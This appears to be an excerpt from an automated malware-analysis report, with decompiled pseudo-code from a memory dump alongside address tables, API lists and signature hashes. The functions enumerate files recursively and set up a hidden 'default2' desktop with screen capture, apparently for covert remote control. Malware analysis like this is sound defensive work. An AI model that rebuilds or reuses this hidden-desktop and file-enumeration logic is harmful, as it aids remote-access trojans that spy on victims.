												_t139 = _v3732;
												while(1) {
													_t142 =  *_t102;
													if(_t142 !=  *_t139) {
														break;
													}
													if(_t142 == 0) {
														L31:
														_t137 = 0;
													} else {
														_t143 =  *((intOrPtr*)(_t102 + 2));
														if(_t143 !=  *((intOrPtr*)(_t139 + 2))) {
															break;
														} else {
															_t102 = _t102 + 4;
															_t139 = _t139 + 4;
															if(_t143 != 0) {
																continue;
															} else {
																goto L31;
															}
														}
													}
													L33:
													_t104 = 0 | _t137 == 0x00000000;
													goto L34;
												}
												asm("sbb ecx, ecx");
												_t137 = _t139 | 0x00000001;
												goto L33;
											} else {
												_push(_v3732);
												_push( &_v2096);
												_t128 = E04EDD36B(_t137);
												_t157 = _t157 + 8;
												asm("sbb eax, eax");
												_t104 =  ~( ~_t128);
											}
											L34:
											if(_t104 != 0) {
												_t37 = _t152 - 0x410; // 0x23f0
												if(_t148 > _t37) {
													_t154 = _t152 + 0x410;
													_v3736 = _t154;
													_t133 = LocalReAlloc(_t133, _t154, 0x42);
												}
												 *(_t148 + _t133) = _v3728.dwFileAttributes & 0x00000010;
												_t149 = _t148 + 1;
												wsprintfW( &_v1056, L"%s\\%s", _v3740,  &(_v3728.cFileName));
												_t153 = 2 + lstrlenW( &_v1056) * 2;
												E04EDDC90(_t149 + _t133,  &_v1056, _t153);
												_t150 = _t149 + _t153;
												_t152 = _v3736;
												_t157 = _t157 + 0x1c;
												 *((intOrPtr*)(_t150 + _t133)) = _v3728.nFileSizeHigh;
												 *((intOrPtr*)(_t150 + _t133 + 4)) = _v3728.nFileSizeLow;
												 *((intOrPtr*)(_t150 + _t133 + 8)) = _v3728.ftLastWriteTime;
												 *((intOrPtr*)(_t150 + _t133 + 0xc)) = _v3704;
												_t148 = _t150 + 0x10;
											}
											if((_v3728.dwFileAttributes & 0x00000010) != 0) {
												goto L39;
											}
										} else {
											L39:
											E04EDDAD0(_t148,  &_v1056, 0, 0x410);
											wsprintfW( &_v1056, L"%s\\%s", _v3740,  &(_v3728.cFileName));
											_t137 = _v3744;
											_t157 = _t157 + 0x1c;
											E04EB42B0(_t133, _t137, _t148, _t152,  &_v1056, _v3732, _a12, _a16, _a20);
										}
									}
									goto L40;
								}
								asm("sbb eax, eax");
								_t100 = _t99 | 0x00000001;
								goto L17;
							}
							goto L40;
						}
						asm("sbb eax, eax");
						_t92 = _t91 | 0x00000001;
						goto L9;
						L40:
					} while (FindNextFileW(_v3748,  &_v3728) != 0);
					if(_t148 > 1) {
						_push(_t137);
						_push(0x3f);
						_push(_t148);
						_push(_t133);
						E04EB1C60( *((intOrPtr*)(_v3744 + 4)));
					}
					LocalFree(_t133);
					FindClose(_v3748);
				}
				return E04ED572E(_v12 ^ _t155);
			}










































                                                                                    0x04eb42b9
                                                                                    0x04eb42c0
                                                                                    0x04eb42c9
                                                                                    0x04eb42cc
                                                                                    0x04eb42d4
                                                                                    0x04eb42da
                                                                                    0x04eb42e0
                                                                                    0x04eb42e6
                                                                                    0x04eb42f3
                                                                                    0x04eb4301
                                                                                    0x04eb4307
                                                                                    0x04eb4318
                                                                                    0x04eb431e
                                                                                    0x04eb4327
                                                                                    0x04eb432d
                                                                                    0x04eb4330
                                                                                    0x04eb4335
                                                                                    0x04eb4340
                                                                                    0x04eb4340
                                                                                    0x04eb4345
                                                                                    0x04eb4350
                                                                                    0x04eb4350
                                                                                    0x04eb4356
                                                                                    0x00000000
                                                                                    0x00000000
                                                                                    0x04eb435b
                                                                                    0x04eb4372
                                                                                    0x04eb4372
                                                                                    0x04eb435d
                                                                                    0x04eb435d
                                                                                    0x04eb4361
                                                                                    0x04eb4365
                                                                                    0x00000000
                                                                                    0x04eb4367
                                                                                    0x04eb4367
                                                                                    0x04eb436a
                                                                                    0x04eb4370
                                                                                    0x00000000
                                                                                    0x00000000
                                                                                    0x00000000
                                                                                    0x00000000
                                                                                    0x04eb4370
                                                                                    0x04eb4365
                                                                                    0x04eb437b
                                                                                    0x04eb437d
                                                                                    0x04eb4383
                                                                                    0x04eb4388
                                                                                    0x04eb4390
                                                                                    0x04eb4390
                                                                                    0x04eb4396
                                                                                    0x00000000
                                                                                    0x00000000
                                                                                    0x04eb439b
                                                                                    0x04eb43b2
                                                                                    0x04eb43b2
                                                                                    0x04eb439d
                                                                                    0x04eb439d
                                                                                    0x04eb43a1
                                                                                    0x04eb43a5
                                                                                    0x00000000
                                                                                    0x04eb43a7
                                                                                    0x04eb43a7
                                                                                    0x04eb43aa
                                                                                    0x04eb43b0
                                                                                    0x00000000
                                                                                    0x00000000
                                                                                    0x00000000
                                                                                    0x00000000
                                                                                    0x04eb43b0
                                                                                    0x04eb43a5
                                                                                    0x04eb43bb
                                                                                    0x04eb43bd
                                                                                    0x04eb43c3
                                                                                    0x04eb43c5
                                                                                    0x04eb43c5
                                                                                    0x04eb43cd
                                                                                    0x04eb43d0
                                                                                    0x04eb43d8
                                                                                    0x04eb43e1
                                                                                    0x04eb43ea
                                                                                    0x04eb43ef
                                                                                    0x04eb43ef
                                                                                    0x04eb43f6
                                                                                    0x04eb4409
                                                                                    0x04eb440f
                                                                                    0x04eb4428
                                                                                    0x04eb4430
                                                                                    0x04eb4430
                                                                                    0x04eb4436
                                                                                    0x00000000
                                                                                    0x00000000
                                                                                    0x04eb443b
                                                                                    0x04eb4452
                                                                                    0x04eb4452
                                                                                    0x04eb443d
                                                                                    0x04eb443d
                                                                                    0x04eb4445
                                                                                    0x00000000
                                                                                    0x04eb4447
                                                                                    0x04eb4447
                                                                                    0x04eb444a
                                                                                    0x04eb4450
                                                                                    0x00000000
                                                                                    0x00000000
                                                                                    0x00000000
                                                                                    0x00000000
                                                                                    0x04eb4450
                                                                                    0x04eb4445
                                                                                    0x04eb445b
                                                                                    0x04eb445f
                                                                                    0x00000000
                                                                                    0x04eb445f
                                                                                    0x04eb4456
                                                                                    0x04eb4458
                                                                                    0x00000000
                                                                                    0x04eb4411
                                                                                    0x04eb4411
                                                                                    0x04eb4417
                                                                                    0x04eb4418
                                                                                    0x04eb441d
                                                                                    0x04eb4422
                                                                                    0x04eb4424
                                                                                    0x04eb4424
                                                                                    0x04eb4462
                                                                                    0x04eb4464
                                                                                    0x04eb446a
                                                                                    0x04eb4472
                                                                                    0x04eb4474
                                                                                    0x04eb447e
                                                                                    0x04eb448a
                                                                                    0x04eb448a
                                                                                    0x04eb4494
                                                                                    0x04eb44aa
                                                                                    0x04eb44b1
                                                                                    0x04eb44c7
                                                                                    0x04eb44da
                                                                                    0x04eb44e5
                                                                                    0x04eb44e7
                                                                                    0x04eb44ed
                                                                                    0x04eb44f0
                                                                                    0x04eb44f9
                                                                                    0x04eb4503
                                                                                    0x04eb450d
                                                                                    0x04eb4511
                                                                                    0x04eb4511
                                                                                    0x04eb451b
                                                                                    0x00000000
                                                                                    0x00000000
                                                                                    0x04eb451d
                                                                                    0x04eb451d
                                                                                    0x04eb452b
                                                                                    0x04eb454c
                                                                                    0x04eb4552
                                                                                    0x04eb455e
                                                                                    0x04eb4571
                                                                                    0x04eb4571
                                                                                    0x04eb43f6
                                                                                    0x00000000
                                                                                    0x04eb43bd
                                                                                    0x04eb43b6
                                                                                    0x04eb43b8
                                                                                    0x00000000
                                                                                    0x04eb43b8
                                                                                    0x00000000
                                                                                    0x04eb437d
                                                                                    0x04eb4376
                                                                                    0x04eb4378
                                                                                    0x00000000
                                                                                    0x04eb4576
                                                                                    0x04eb4589
                                                                                    0x04eb4594
                                                                                    0x04eb459c
                                                                                    0x04eb459d
                                                                                    0x04eb459f
                                                                                    0x04eb45a3
                                                                                    0x04eb45a4
                                                                                    0x04eb45a4
                                                                                    0x04eb45aa
                                                                                    0x04eb45b6
                                                                                    0x04eb45b6
                                                                                    0x04eb45ce

                                                                                    APIs
                                                                                    • LocalAlloc.KERNEL32(00000040,00002800,?,?,?), ref: 04EB42EC
                                                                                    • wsprintfW.USER32 ref: 04EB4301
                                                                                    • FindFirstFileW.KERNEL32(?,?), ref: 04EB4318
                                                                                    • _wcsstr.LIBVCRUNTIME ref: 04EB4418
                                                                                    • LocalReAlloc.KERNEL32(00000000,000023F0,00000042), ref: 04EB4484
                                                                                    • wsprintfW.USER32 ref: 04EB44B1
                                                                                    • lstrlenW.KERNEL32(?), ref: 04EB44C1
                                                                                    • wsprintfW.USER32 ref: 04EB454C
                                                                                    • FindNextFileW.KERNEL32(?,?), ref: 04EB4583
                                                                                    • LocalFree.KERNEL32(00000000), ref: 04EB45AA
                                                                                    • FindClose.KERNEL32(?), ref: 04EB45B6
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 0000000D.00000002.415946366.0000000004EB0000.00000040.00000001.sdmp, Offset: 04EB0000, based on PE: true
                                                                                    Yara matches
                                                                                    Similarity
                                                                                    • API ID: FindLocalwsprintf$AllocFile$CloseFirstFreeNext_wcsstrlstrlen
                                                                                    • String ID: %s\%s$%s\*.*
                                                                                    • API String ID: 2479123022-1665845743
                                                                                    • Opcode ID: 9e52daa64e18d4dbb00c3bba676fb793c3b512214d50f10c7dc15aa2393fee7c
                                                                                    • Instruction ID: 4316bc4760e0aa830464f546415cd692c446310a765b1206eb9e99ac04b44a4c
                                                                                    • Opcode Fuzzy Hash: 9e52daa64e18d4dbb00c3bba676fb793c3b512214d50f10c7dc15aa2393fee7c
                                                                                    • Instruction Fuzzy Hash: 3A91D1719002199BDB20DF64CC44BFAB7B9FF15318F4498A5E949E3182E772EA84CF90
                                                                                    Uniqueness

                                                                                    Uniqueness Score: -1.00%

                                                                                    Function 04EB6590, Relevance: 22.9, APIs: 11, Strings: 2, Instructions: 162threadCOMMON
                                                                                    Download Yara Rule
                                                                                    C-Code - Quality: 55%
                                                                                    			E04EB6590(void* __ebx, intOrPtr* __ecx, signed int __edx, void* __edi, void* __esi, intOrPtr _a4) {
				signed int _v12;
				short _v80;
				void* _v108;
				void* _v116;
				struct tagMONITORINFO _v120;
				struct _devicemodeW _v344;
				struct _OSVERSIONINFOA _v496;
				intOrPtr _v780;
				char _v784;
				signed int _t55;
				intOrPtr _t57;
				WCHAR* _t60;
				struct HMONITOR__* _t62;
				signed int _t77;
				struct HDC__* _t83;
				struct HDC__* _t84;
				intOrPtr* _t100;
				signed int _t103;
				struct HDC__* _t104;
				signed int _t109;
				intOrPtr* _t112;
				signed int _t114;
				char* _t115;
				signed int _t116;

				_t109 = __edx;
				_t55 =  *0x4f03008; // 0x3d21fb31
				_v12 = _t55 ^ _t116;
				_t57 = _a4;
				_t112 = __ecx;
				 *__ecx = 0x4efd8b0;
				 *((intOrPtr*)(__ecx + 4)) = _t57;
				 *((intOrPtr*)(_t57 + 0x38)) = __ecx;
				 *((intOrPtr*)(_t112 + 8)) = CreateEventW(0, 1, 0, 0);
				 *_t112 = 0x4efcf68;
				E04EB6520();
				 *(_t112 + 0x74) = 0;
				 *(_t112 + 0x78) = 0;
				 *(_t112 + 0x7c) = 0;
				 *(_t112 + 0x80) = 0;
				 *(_t112 + 0x70) = L"default2";
				_t60 = OpenDesktopW(L"default2", 0, 1, 0x10000000);
				 *(_t112 + 0xc) = _t60;
				_t125 = _t60;
				if(_t60 == 0) {
					 *(_t112 + 0xc) = CreateDesktopW( *(_t112 + 0x70), _t60, _t60, _t60, 0x10000000, _t60);
				}
				SetThreadDesktop( *(_t112 + 0xc));
				_t62 = GetDesktopWindow();
				__imp__MonitorFromWindow(_t62, 2);
				_v120.cbSize = 0x68;
				GetMonitorInfoW(_t62,  &_v120);
				_v344.dmSize = 0xdc;
				EnumDisplaySettingsW( &_v80, 0xffffffff,  &_v344);
				_t114 = _v344.dmPelsWidth;
				_t100 = _t112 + 0x38;
				asm("movd xmm1, esi");
				asm("cvtdq2pd xmm1, xmm1");
				asm("addsd xmm1, [eax*8+0x4efe8d0]");
				asm("movd xmm0, eax");
				asm("cvtdq2pd xmm0, xmm0");
				asm("divsd xmm1, xmm0");
				asm("movsd [edi+0x68], xmm1");
				E04EDDAD0(_t112, _t100, 0, 0x2c);
				_t103 = _v344.dmPelsHeight;
				 *_t100 = 0x28;
				asm("cdq");
				 *(_t112 + 0x3c) = _t114;
				 *(_t112 + 0x40) = _t103;
				 *((intOrPtr*)(_t112 + 0x44)) = 0x180001;
				 *(_t112 + 0x48) = 0;
				 *(_t112 + 0x58) = 0;
				_t77 = (0x1f + (_t114 + _t114 * 2) * 8 + (_t109 & 0x0000001f) >> 5) * _t103 << 2;
				_push(_t77);
				 *(_t112 + 0x4c) = _t77;
				 *((intOrPtr*)(_t112 + 0x10)) = E04ED5785(_t103, _t114, _t125);
				_push( *(_t112 + 0x4c));
				 *((intOrPtr*)(_t112 + 0x88)) = E04ED5785(_t103, _t114, _t125);
				_push( *(_t112 + 0x4c) +  *(_t112 + 0x4c));
				 *((intOrPtr*)(_t112 + 0x84)) = E04ED5785(_t103, _t114, _t125);
				_t83 = GetDC(0);
				 *(_t112 + 0x14) = _t83;
				_t84 = CreateCompatibleDC(_t83);
				asm("movsd xmm0, [edi+0x68]");
				_t104 = _t84;
				 *(_t112 + 0x20) =  *(_t112 + 0x14);
				 *(_t112 + 0x18) = _t104;
				 *(_t112 + 0x24) = _t104;
				asm("movsd [edi+0x28], xmm0");
				_v496.dwOSVersionInfoSize = 0x94;
				GetVersionExA( &_v496);
				E04EC5A10( &_v784, _t112, _t114);
				 *((intOrPtr*)(_t112 + 0x30)) = _v784;
				_push(0x2d);
				 *((intOrPtr*)(_t112 + 0x34)) = _v780;
				_t115 = E04ED5785( &_v784, _t114, _t125);
				if(_t115 != 0) {
					_t52 = _t115 + 1; // 0x1
					 *_t115 = 0xac;
					E04EDDC90(_t52, _t100, 0x2c);
					_push(0x3f);
					_push(0x2d);
					_push(_t115);
					E04EB1C60( *((intOrPtr*)(_t112 + 4)));
					E04ED573F(_t115);
				}
				return E04ED572E(_v12 ^ _t116);
			}



























                                                                                    0x04eb6590
                                                                                    0x04eb6599
                                                                                    0x04eb65a0
                                                                                    0x04eb65a3
                                                                                    0x04eb65ab
                                                                                    0x04eb65b3
                                                                                    0x04eb65b9
                                                                                    0x04eb65bc
                                                                                    0x04eb65c5
                                                                                    0x04eb65c8
                                                                                    0x04eb65ce
                                                                                    0x04eb65e1
                                                                                    0x04eb65e8
                                                                                    0x04eb65ef
                                                                                    0x04eb65f6
                                                                                    0x04eb6600
                                                                                    0x04eb6607
                                                                                    0x04eb660d
                                                                                    0x04eb6610
                                                                                    0x04eb6612
                                                                                    0x04eb6626
                                                                                    0x04eb6626
                                                                                    0x04eb662c
                                                                                    0x04eb6632
                                                                                    0x04eb663b
                                                                                    0x04eb6644
                                                                                    0x04eb664d
                                                                                    0x04eb6659
                                                                                    0x04eb666a
                                                                                    0x04eb6670
                                                                                    0x04eb6676
                                                                                    0x04eb6680
                                                                                    0x04eb6684
                                                                                    0x04eb668b
                                                                                    0x04eb669a
                                                                                    0x04eb669e
                                                                                    0x04eb66a2
                                                                                    0x04eb66a6
                                                                                    0x04eb66ab
                                                                                    0x04eb66b0
                                                                                    0x04eb66c0
                                                                                    0x04eb66c6
                                                                                    0x04eb66cd
                                                                                    0x04eb66d2
                                                                                    0x04eb66db
                                                                                    0x04eb66e2
                                                                                    0x04eb66e9
                                                                                    0x04eb66f0
                                                                                    0x04eb66f3
                                                                                    0x04eb66f4
                                                                                    0x04eb66ff
                                                                                    0x04eb6702
                                                                                    0x04eb670a
                                                                                    0x04eb6718
                                                                                    0x04eb6721
                                                                                    0x04eb6729
                                                                                    0x04eb6730
                                                                                    0x04eb6733
                                                                                    0x04eb6739
                                                                                    0x04eb673e
                                                                                    0x04eb6743
                                                                                    0x04eb674c
                                                                                    0x04eb674f
                                                                                    0x04eb6752
                                                                                    0x04eb6757
                                                                                    0x04eb6762
                                                                                    0x04eb676e
                                                                                    0x04eb6779
                                                                                    0x04eb6782
                                                                                    0x04eb6784
                                                                                    0x04eb678c
                                                                                    0x04eb6793
                                                                                    0x04eb6797
                                                                                    0x04eb679a
                                                                                    0x04eb679f
                                                                                    0x04eb67aa
                                                                                    0x04eb67ac
                                                                                    0x04eb67ae
                                                                                    0x04eb67af
                                                                                    0x04eb67b5
                                                                                    0x04eb67ba
                                                                                    0x04eb67cf

                                                                                    APIs
                                                                                    • CreateEventW.KERNEL32(00000000,00000001,00000000,00000000), ref: 04EB65BF
                                                                                      • Part of subcall function 04EB6520: LoadLibraryA.KERNEL32(User32.dll,?,04EB65D3), ref: 04EB6526
                                                                                    • OpenDesktopW.USER32(default2,00000000,00000001,10000000), ref: 04EB6607
                                                                                    • CreateDesktopW.USER32 ref: 04EB6620
                                                                                    • SetThreadDesktop.USER32(?), ref: 04EB662C
                                                                                    • GetDesktopWindow.USER32 ref: 04EB6632
                                                                                    • MonitorFromWindow.USER32(00000000,00000002), ref: 04EB663B
                                                                                    • GetMonitorInfoW.USER32 ref: 04EB664D
                                                                                    • EnumDisplaySettingsW.USER32 ref: 04EB666A
                                                                                    • GetDC.USER32(00000000), ref: 04EB6729
                                                                                    • CreateCompatibleDC.GDI32(00000000), ref: 04EB6733
                                                                                    • GetVersionExA.KERNEL32(?), ref: 04EB6762
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 0000000D.00000002.415946366.0000000004EB0000.00000040.00000001.sdmp, Offset: 04EB0000, based on PE: true
                                                                                    Yara matches
                                                                                    Similarity
                                                                                    • API ID: Desktop$Create$MonitorWindow$CompatibleDisplayEnumEventFromInfoLibraryLoadOpenSettingsThreadVersion
                                                                                    • String ID: default2$h
                                                                                    • API String ID: 1408810681-1613360701
                                                                                    • Opcode ID: dd6dfb2ee54577a8f5c02bb392ab79968e17f4eec564577992adc81b513d5600
                                                                                    • Instruction ID: 2b0fd80a7d1bef4a43c9abc2779f2018a18ebb723db8cadd2e6c9487b603acba
                                                                                    • Opcode Fuzzy Hash: dd6dfb2ee54577a8f5c02bb392ab79968e17f4eec564577992adc81b513d5600
                                                                                    • Instruction Fuzzy Hash: BE619DB0900A0ABFE711DF75DC49B9ABBB8FF44305F104229E9059B680EB74B965CF91
                                                                                    Uniqueness

                                                                                    Uniqueness Score: -1.00%

                                                                                    Function 04EB53D0, Relevance: 21.2, APIs: 9, Strings: 3, Instructions: 184filestringCOMMON
                                                                                    Download Yara Rule
                                                                                    C-Code - Quality: 42%
                                                                                    			E04EB53D0(void* __ebx, void* __ecx, void* __edi, WCHAR* _a4) {
				signed int _v12;
				signed int _v1056;
				short _v2096;
				intOrPtr _v2100;
				intOrPtr _v2104;
				char _v2120;
				struct _WIN32_FIND_DATAW _v2712;
				signed int _v2713;
				intOrPtr _v2720;
				void* _v2724;
				void* __ebp;
				signed int _t64;
				void* _t73;
				signed int _t74;
				signed int _t75;
				signed int _t77;
				signed int _t82;
				signed int _t89;
				signed int _t90;
				signed int _t94;
				intOrPtr _t99;
				intOrPtr _t105;
				intOrPtr* _t108;
				signed int _t109;
				void* _t116;
				intOrPtr* _t121;
				intOrPtr* _t128;
				void* _t131;
				signed int _t134;
				signed int _t138;
				signed int _t139;
				intOrPtr _t140;
				void* _t141;
				signed int _t142;
				signed int _t143;
				WCHAR* _t145;
				intOrPtr _t150;
				intOrPtr _t152;
				void* _t153;
				signed int _t156;
				void* _t158;
				void* _t160;

				_t64 =  *0x4f03008; // 0x3d21fb31
				_v12 = _t64 ^ _t156;
				_t145 = _a4;
				_t116 = __ecx;
				E04EDDAD0(_t145,  &_v2096, 0, 0x410);
				lstrlenW(_t145);
				_t150 =  !=  ? 0x4efc92c : 0x4efb5d0;
				_v2720 = 0x4efb5d0;
				wsprintfW( &_v2096, L"%s%s*.*", _t145, 0x4efb5d0);
				_t160 = _t158 + 0x1c;
				_t73 = FindFirstFileW( &_v2096,  &_v2712);
				_v2724 = _t73;
				if(_t73 != 0xffffffff) {
					_v2713 = 1;
					asm("o16 nop [eax+eax]");
					do {
						_t121 = ".";
						_t74 =  &(_v2712.cFileName);
						while(1) {
							_t138 =  *_t74;
							__eflags = _t138 -  *_t121;
							if(_t138 !=  *_t121) {
								break;
							}
							__eflags = _t138;
							if(_t138 == 0) {
								L8:
								_t75 = 0;
							} else {
								_t143 =  *((intOrPtr*)(_t74 + 2));
								__eflags = _t143 -  *((intOrPtr*)(_t121 + 2));
								if(_t143 !=  *((intOrPtr*)(_t121 + 2))) {
									break;
								} else {
									_t74 = _t74 + 4;
									_t121 = _t121 + 4;
									__eflags = _t143;
									if(_t143 != 0) {
										continue;
									} else {
										goto L8;
									}
								}
							}
							L10:
							__eflags = _t75;
							if(_t75 == 0) {
								goto L29;
							} else {
								_t128 = L"..";
								_t89 =  &(_v2712.cFileName);
								while(1) {
									_t139 =  *_t89;
									__eflags = _t139 -  *_t128;
									if(_t139 !=  *_t128) {
										break;
									}
									__eflags = _t139;
									if(_t139 == 0) {
										L16:
										_t90 = 0;
									} else {
										_t142 =  *((intOrPtr*)(_t89 + 2));
										__eflags = _t142 -  *((intOrPtr*)(_t128 + 2));
										if(_t142 !=  *((intOrPtr*)(_t128 + 2))) {
											break;
										} else {
											_t89 = _t89 + 4;
											_t128 = _t128 + 4;
											__eflags = _t142;
											if(_t142 != 0) {
												continue;
											} else {
												goto L16;
											}
										}
									}
									L18:
									__eflags = _t90;
									if(_t90 == 0) {
										goto L29;
									} else {
										__eflags = _v2712.dwFileAttributes & 0x00000010;
										_push( &(_v2712.cFileName));
										_push(_t150);
										_push(_t145);
										_v2713 = 0;
										_push(L"%s%s%s");
										_push( &_v1056);
										if((_v2712.dwFileAttributes & 0x00000010) == 0) {
											wsprintfW();
											_t94 = 0;
											_v2100 = 7;
											_t160 = _t160 + 0x14;
											_v2104 = 0;
											_v2120 = 0;
											__eflags = _v1056;
											if(_v1056 != 0) {
												_t108 =  &_v1056;
												_t141 = _t108 + 2;
												do {
													_t134 =  *_t108;
													_t108 = _t108 + 2;
													__eflags = _t134;
												} while (_t134 != 0);
												_t109 = _t108 - _t141;
												__eflags = _t109;
												_t94 = _t109 >> 1;
											}
											_push(_t94);
											E04EB32A0( &_v2120,  &_v1056);
											_t152 =  *((intOrPtr*)(_t116 + 0xc));
											_t140 = E04EB5CE0(_t152,  *((intOrPtr*)(_t152 + 4)),  &_v2120);
											_t99 =  *((intOrPtr*)(_t116 + 0x10));
											_t131 = 0x7fffffe - _t99;
											__eflags = _t131 - 1;
											if(__eflags < 0) {
												_push("list<T> too long");
												E04ED665F(__eflags);
												asm("int3");
												asm("int3");
												asm("int3");
												asm("int3");
												asm("int3");
												asm("int3");
												asm("int3");
												asm("int3");
												asm("int3");
												asm("int3");
												asm("int3");
												asm("int3");
												asm("int3");
												asm("int3");
												asm("int3");
												asm("int3");
												_push(_t156);
												_push(_t131);
												_push(_t152);
												_t153 = _t131;
												__eflags =  *(_t153 + 0x10);
												if( *(_t153 + 0x10) != 0) {
													_t131 = _t153 + 0xc;
													E04EB59F0(_t131, _t140);
												}
												_push(_t131);
												_push(0x3f);
												_push(1);
												_push( &_v12);
												_v12 = 0x6c;
												return E04EB1C60( *((intOrPtr*)(_t153 + 4)));
											} else {
												 *((intOrPtr*)(_t116 + 0x10)) = _t99 + 1;
												 *((intOrPtr*)(_t152 + 4)) = _t140;
												 *((intOrPtr*)( *((intOrPtr*)(_t140 + 4)))) = _t140;
												_t105 = _v2100;
												__eflags = _t105 - 8;
												if(_t105 >= 8) {
													__eflags = _t105 + 1;
													E04EB3540(_t116, _t140, _t145, _v2120, _t105 + 1);
												}
												_t150 = _v2720;
												goto L29;
											}
										} else {
											wsprintfW();
											_t160 = _t160 + 0x14;
											E04EB53D0(_t116, _t116, _t145,  &_v1056);
											goto L29;
										}
									}
									goto L40;
								}
								asm("sbb eax, eax");
								_t90 = _t89 | 0x00000001;
								__eflags = _t90;
								goto L18;
							}
							goto L40;
						}
						asm("sbb eax, eax");
						_t75 = _t74 | 0x00000001;
						__eflags = _t75;
						goto L10;
						L29:
						_t77 = FindNextFileW(_v2724,  &_v2712);
						__eflags = _t77;
					} while (_t77 != 0);
					FindClose(_v2724);
					__eflags = _v2713;
					if(_v2713 != 0) {
						_t82 = lstrlenW(_t145);
						_push(_t145);
						__eflags =  *((short*)(_t145 + _t82 * 2 - 2)) - 0x5c;
						if( *((short*)(_t145 + _t82 * 2 - 2)) != 0x5c) {
							E04EB31B0( &_v2120, _t145);
							E04EB5AB0( &_v2120,  &_v2120, 1);
						} else {
							E04EB31B0( &_v2120, _t145);
						}
						_push( &_v2120);
						E04EB5A60(_t116 + 0xc, __eflags);
						E04EB3170( &_v2120);
					}
					__eflags = _v12 ^ _t156;
					return E04ED572E(_v12 ^ _t156);
				} else {
					return E04ED572E(_v12 ^ _t156);
				}
				L40:
			}













































                                                                                    0x04eb53d9
                                                                                    0x04eb53e0
                                                                                    0x04eb53e6
                                                                                    0x04eb53f7
                                                                                    0x04eb53f9
                                                                                    0x04eb5402
                                                                                    0x04eb541e
                                                                                    0x04eb5429
                                                                                    0x04eb542f
                                                                                    0x04eb5435
                                                                                    0x04eb5446
                                                                                    0x04eb544c
                                                                                    0x04eb5455
                                                                                    0x04eb546c
                                                                                    0x04eb5477
                                                                                    0x04eb5480
                                                                                    0x04eb5480
                                                                                    0x04eb5485
                                                                                    0x04eb5490
                                                                                    0x04eb5490
                                                                                    0x04eb5493
                                                                                    0x04eb5496
                                                                                    0x00000000
                                                                                    0x00000000
                                                                                    0x04eb5498
                                                                                    0x04eb549b
                                                                                    0x04eb54b2
                                                                                    0x04eb54b2
                                                                                    0x04eb549d
                                                                                    0x04eb549d
                                                                                    0x04eb54a1
                                                                                    0x04eb54a5
                                                                                    0x00000000
                                                                                    0x04eb54a7
                                                                                    0x04eb54a7
                                                                                    0x04eb54aa
                                                                                    0x04eb54ad
                                                                                    0x04eb54b0
                                                                                    0x00000000
                                                                                    0x00000000
                                                                                    0x00000000
                                                                                    0x00000000
                                                                                    0x04eb54b0
                                                                                    0x04eb54a5
                                                                                    0x04eb54bb
                                                                                    0x04eb54bb
                                                                                    0x04eb54bd
                                                                                    0x00000000
                                                                                    0x04eb54c3
                                                                                    0x04eb54c3
                                                                                    0x04eb54c8
                                                                                    0x04eb54d0
                                                                                    0x04eb54d0
                                                                                    0x04eb54d3
                                                                                    0x04eb54d6
                                                                                    0x00000000
                                                                                    0x00000000
                                                                                    0x04eb54d8
                                                                                    0x04eb54db
                                                                                    0x04eb54f2
                                                                                    0x04eb54f2
                                                                                    0x04eb54dd
                                                                                    0x04eb54dd
                                                                                    0x04eb54e1
                                                                                    0x04eb54e5
                                                                                    0x00000000
                                                                                    0x04eb54e7
                                                                                    0x04eb54e7
                                                                                    0x04eb54ea
                                                                                    0x04eb54ed
                                                                                    0x04eb54f0
                                                                                    0x00000000
                                                                                    0x00000000
                                                                                    0x00000000
                                                                                    0x00000000
                                                                                    0x04eb54f0
                                                                                    0x04eb54e5
                                                                                    0x04eb54fb
                                                                                    0x04eb54fb
                                                                                    0x04eb54fd
                                                                                    0x00000000
                                                                                    0x04eb5503
                                                                                    0x04eb5503
                                                                                    0x04eb5510
                                                                                    0x04eb5511
                                                                                    0x04eb5512
                                                                                    0x04eb5519
                                                                                    0x04eb5520
                                                                                    0x04eb5525
                                                                                    0x04eb5526
                                                                                    0x04eb5544
                                                                                    0x04eb554a
                                                                                    0x04eb554c
                                                                                    0x04eb5556
                                                                                    0x04eb5559
                                                                                    0x04eb5563
                                                                                    0x04eb556a
                                                                                    0x04eb5571
                                                                                    0x04eb5573
                                                                                    0x04eb5579
                                                                                    0x04eb5580
                                                                                    0x04eb5580
                                                                                    0x04eb5583
                                                                                    0x04eb5586
                                                                                    0x04eb5586
                                                                                    0x04eb558b
                                                                                    0x04eb558b
                                                                                    0x04eb558d
                                                                                    0x04eb558d
                                                                                    0x04eb558f
                                                                                    0x04eb559d
                                                                                    0x04eb55a2
                                                                                    0x04eb55b5
                                                                                    0x04eb55bc
                                                                                    0x04eb55bf
                                                                                    0x04eb55c1
                                                                                    0x04eb55c4
                                                                                    0x04eb5686
                                                                                    0x04eb568b
                                                                                    0x04eb5690
                                                                                    0x04eb5691
                                                                                    0x04eb5692
                                                                                    0x04eb5693
                                                                                    0x04eb5694
                                                                                    0x04eb5695
                                                                                    0x04eb5696
                                                                                    0x04eb5697
                                                                                    0x04eb5698
                                                                                    0x04eb5699
                                                                                    0x04eb569a
                                                                                    0x04eb569b
                                                                                    0x04eb569c
                                                                                    0x04eb569d
                                                                                    0x04eb569e
                                                                                    0x04eb569f
                                                                                    0x04eb56a0
                                                                                    0x04eb56a3
                                                                                    0x04eb56a4
                                                                                    0x04eb56a5
                                                                                    0x04eb56a7
                                                                                    0x04eb56ab
                                                                                    0x04eb56ad
                                                                                    0x04eb56b0
                                                                                    0x04eb56b0
                                                                                    0x04eb56b5
                                                                                    0x04eb56bc
                                                                                    0x04eb56be
                                                                                    0x04eb56c0
                                                                                    0x04eb56c1
                                                                                    0x04eb56ce
                                                                                    0x04eb55ca
                                                                                    0x04eb55cd
                                                                                    0x04eb55d0
                                                                                    0x04eb55d6
                                                                                    0x04eb55d8
                                                                                    0x04eb55de
                                                                                    0x04eb55e1
                                                                                    0x04eb55e3
                                                                                    0x04eb55eb
                                                                                    0x04eb55eb
                                                                                    0x04eb55f0
                                                                                    0x00000000
                                                                                    0x04eb55f0
                                                                                    0x04eb5528
                                                                                    0x04eb5528
                                                                                    0x04eb552e
                                                                                    0x04eb553a
                                                                                    0x00000000
                                                                                    0x04eb553a
                                                                                    0x04eb5526
                                                                                    0x00000000
                                                                                    0x04eb54fd
                                                                                    0x04eb54f6
                                                                                    0x04eb54f8
                                                                                    0x04eb54f8
                                                                                    0x00000000
                                                                                    0x04eb54f8
                                                                                    0x00000000
                                                                                    0x04eb54bd
                                                                                    0x04eb54b6
